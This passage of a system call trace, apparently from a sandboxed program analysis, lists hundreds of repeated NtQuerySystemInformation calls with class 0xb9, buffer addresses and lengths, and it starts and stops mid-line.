Length=0x0, ResultLength=0x0) [0286.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0286.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0286.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0286.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0286.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0286.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0286.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0286.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0286.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0286.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0286.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0286.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0286.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0286.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0286.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0286.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0286.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0286.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0286.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0286.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0286.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf50, Length=0x48, ResultLength=0x0) [0286.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x28, ResultLength=0x0) [0286.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x28, ResultLength=0x0) [0286.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0286.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf50, Length=0x48, ResultLength=0x0) [0286.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x28, ResultLength=0x0) [0286.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x28, ResultLength=0x0) [0286.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0286.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0286.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x50, ResultLength=0x0) [0286.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x50, ResultLength=0x0) [0286.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x50, ResultLength=0x0) [0286.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0286.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0286.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0286.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0286.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0286.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x28, ResultLength=0x0) [0286.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x28, ResultLength=0x0) [0286.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x28, ResultLength=0x0) [0286.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0286.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0286.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x28, ResultLength=0x0) [0286.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x28, ResultLength=0x0) [0286.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0286.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0286.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0286.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0286.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0286.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0286.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0286.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x20, ResultLength=0x0) [0286.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x20, ResultLength=0x0) [0286.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x50, ResultLength=0x0) [0286.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x50, ResultLength=0x0) [0286.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x50, ResultLength=0x0) [0286.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0286.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0286.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0286.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0286.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0286.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x28, ResultLength=0x0) [0286.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x28, ResultLength=0x0) [0286.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x28, ResultLength=0x0) [0286.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0286.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0286.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x28, ResultLength=0x0) [0286.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x28, ResultLength=0x0) [0286.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0286.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0286.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0286.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0286.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0286.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0286.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0286.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x20, ResultLength=0x0) [0286.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.508] NtQuerySystemInformation 